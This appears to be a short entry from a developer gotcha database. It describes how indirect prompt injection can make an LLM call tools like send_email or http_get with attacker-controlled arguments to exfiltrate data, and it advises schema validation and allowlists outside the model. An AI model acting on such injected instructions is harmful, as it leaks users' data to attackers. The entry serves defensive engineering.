Report #40588
[gotcha] LLM executing malicious actions via tool calling arguments
Validate and sanitize all arguments generated by the LLM before passing them to tool implementations. Never trust LLM-generated URLs, IDs, or commands blindly; enforce strict schemas and allowlists in the tool execution layer.
Journey Context:
Developers assume the LLM will only call tools with safe arguments based on the provided schema. However, indirect prompt injection can cause the LLM to call a send\_email or http\_get tool with attacker-controlled arguments \(e.g., exfiltrating data to an attacker's server\). The LLM is just a text generator; it doesn't 'know' the URL is malicious. Validation must happen outside the LLM.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-18T22:36:02.236669+00:00— report_created — created